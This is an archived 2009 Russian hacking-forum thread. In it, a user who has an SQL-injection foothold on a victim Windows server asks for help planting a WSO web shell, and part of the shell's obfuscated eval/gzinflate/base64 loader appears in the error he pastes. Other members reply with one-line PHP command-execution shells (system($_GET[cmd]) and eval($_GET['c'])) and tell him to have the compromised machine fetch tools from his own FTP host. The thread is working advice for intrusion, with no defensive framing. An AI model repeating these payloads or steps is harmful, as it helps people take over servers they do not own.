ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

24.10.2009, 15:24
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме: 195619
Репутация:
10
|
|
Большое спасибо. Попробую пока конфиги почитать, мож найду абсолютный путь... а то не охота брутить его, хотя видюха с CUDA реально великая вещь в этом деле.
|
|
|

24.10.2009, 17:59
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме: 1091601
Репутация:
19
|
|
Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 1
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 2
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 3
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php on line 4
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\results.php on line 5
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in ..\..\..\..\\results.php(6) : regexp code on line 1
Parse error: parse error, unexpected T_STRING in ..\..\..\..\\results.php(6) : regexp code on line 1
Fatal error: preg_replace(): Failed evaluating code: \x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x 74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63 \x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y 7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/tq/+jMvqywCvv6P39j8FOaR264O3KnccTazAlD57ZsvQqCke9aVWa d+vNwhg/vTo9eBDE+eU7XCftj79oN8fU3Zzpwb/DpxJn0fPhY2eKoh0HoOv1xWS/CiVjJwccKh8EfD2iO4nAWRMtorsqMbK3dZkPHj9ykFvJn7DoDN yxT7o1Grc6e1J+woyBmB8F8OrAlZfLHvfFi7dPd//wN/t+J3Cjygmk3ip0wLmOeHTcMg7AburMgjL3pqFynr97U60ZuXLZ 5sh+M7OrRh7dvzUT43CWAyK6m8k2cm6574/bnMZYXexNXgkAyvXd9b+LF5eTjxBl5/e4f8yB2o244nyKQSB64Q2/qlm1ov9PD4yO7yuxmbZMqjU08SucezfplwQmPhvNpH4lgn06Po S+8WeQ70diFHiGW4ECPQjeeh1PmRV3OKDLxOWccQD8r2ykMNnY cB2uxPNRA3iNo9kel7vvj0zNgwgwJlIBwAKYIXUTB22DkTcuct oHnlq3tPjCIG3a2gfUmbOLG42DQBr6KO++dKFoE4aDFtr3pbB6 z+HbmtmfiK5s6E/7W0ZOjeQ8an107/txt252O3dneQMzwRxRkCaqwfde8CDuVIQ+fYgecTwZP0xz9Gmo C4++SVWAAPMJsfLBCG83jcRdJgB7597+xtctMYcQGOLcx1Yas7 IcfWJlx7HpKhcHIMBDBf4hpNZLaLA7nLnaHC4ML8yVtDF9 in ..\..\..\..\\results.php on line 6
шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
|
|
|

24.10.2009, 18:01
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
лей <?php system($_GET[cmd]) ?> а через него зальеш уже все полноценный если надо будет
|
|
|

24.10.2009, 18:02
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от M1ks
Что может быть, заливаю шелл через sql запрос, файл создается, вроде заливается, но при заходе на него вылазиет ошибка:
шелл WSO, там экранирование походу, как можно обойти? или другой шелл посоветуйте... или может из за того что там винда стоит..
Зачем сразу весь шелл? Для начала eval($_GET['c']);
|
|
|

24.10.2009, 18:02
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме: 1091601
Репутация:
19
|
|
а в вин как лить через кмд?
|
|
|

24.10.2009, 18:04
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
через команду ftp подконекться к своему фтпешнику и слей что нужно, или можеш попробывать создать нужный тебе файл примерно так
Код:
echo "<?php phpinfo(); ?>" > test.php
Последний раз редактировалось warlok; 24.10.2009 в 18:07..
|
|
|

24.10.2009, 18:07
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме: 1091601
Репутация:
19
|
|
на том серве нет фтп, там ток ввв порт опен
|
|
|

24.10.2009, 18:09
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
на том серве нет фтп, там ток ввв порт опен
ты непонял, на том сервере фтп и ненадо ты с него подключаеш к левому и скачиваеш на тачку жетву.
|
|
|

24.10.2009, 18:09
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме: 1091601
Репутация:
19
|
|
всё спс, понял
|
|
|

24.10.2009, 19:35
|
|
Участник форума
Регистрация: 23.08.2007
Сообщений: 157
Провел на форуме: 1091601
Репутация:
19
|
|
чето не получается, я ввожу ftp и адрес, он просит логин.. но ввести я не могу, как быть?
пытался отключить экранирование, в хтаккес прописывал php_value magic_quotes_sybase 0
но сервер не реагирует на него почемуто..
если кто желает помочь) пишите в аську)
Последний раз редактировалось M1ks; 24.10.2009 в 19:39..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|